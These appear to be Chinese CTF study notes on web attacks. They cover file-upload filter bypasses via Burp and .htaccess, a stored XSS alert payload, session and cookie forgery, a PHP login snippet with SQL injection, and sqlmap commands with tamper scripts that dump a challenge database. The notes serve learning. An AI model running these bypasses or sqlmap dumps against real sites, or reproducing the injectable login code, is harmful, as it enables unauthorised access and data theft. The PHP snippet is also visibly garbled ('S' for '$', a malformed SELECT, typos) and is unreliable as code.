文件上传漏洞(反射性漏洞)
源码中有include:大概率是文件上传漏洞
前端绕过
-
更改前端JS代码在白名单中加入.php,或者禁用前端JS验证
-
修改PHP文件后缀为.gif接着用bp抓包修改后缀名
后端绕过
bp更改content-type apache配置文件.htaccess可更改白名单中允许的文件类型
XSS漏洞(存储型)
植入到数据库中的漏洞,每刷新一次就弹窗一次(评论,弹幕,登录)在输入框中输入js语句<script>alert(hello)</script>
session伪造
PHPSESSID=sgfaadgadsgaf 构造会话
cookie伪造
cookie:身份验证 储存到客户端浏览器内
有的登录界面不看你密码是否输对而是看你的cookie是否正确
JavaScript
<script>alert(1)</script>
CSRF 跨站点请求伪造
SQL注入
header(string:"Content-type:text/html;charset=utf-8"); Susername=$_POST['user'] Spassword=md5($_POST['pass']) $sql="select from sy_adminuser where username='Susername'and password='$password'"; $result=mysql_query($sql,$conn); if(mysqL_num_rows(Sresult)){ $row=mysql_fetch_array($result); echo'成功!'; session_start(); $_SESSION['user']=$row['username'];//诽查询结果的数据逃行赋值 header(string:"Location:admin/add_news.php"); }else{ echo'失败!'; //header("Location:Login.php");
SQLmap 使用
-
在sqlmap根目录启用cmd,输入sqlmap.py -u url --batch --level=3 --tamper=“space2comment.py,versionedkeywords.py”
-
sqlmap.py -u http://5d6497a6-a59d-48f8-9b0f-1673c6293fd6.challenge.ctf.show/?id=1 --level=3 --batch -tamper="space2comment.py,versionedkeywords.py" -D web7 -T flag -C flag --dump
-
-D --dbs -T --tables -C --columns --dump
--dbs 列举DBMS数据库 --tables 列举DBMS数据库表 --columns 列举DBMS数据库表列 --schema Enumerate DBMS schema --dump 转储DBMS数据库表条目 --dump-all 转储所有DBMS数据库表条目 -D DB 数据库管理系统数据库来列举 -T TBL 数据库管理系统数据库表(s)列举 -C COL 数据库管理系统数据库表列(s)枚举 --batch 使用默认的行为 --tamper 启用绕过脚本 --level 探测等级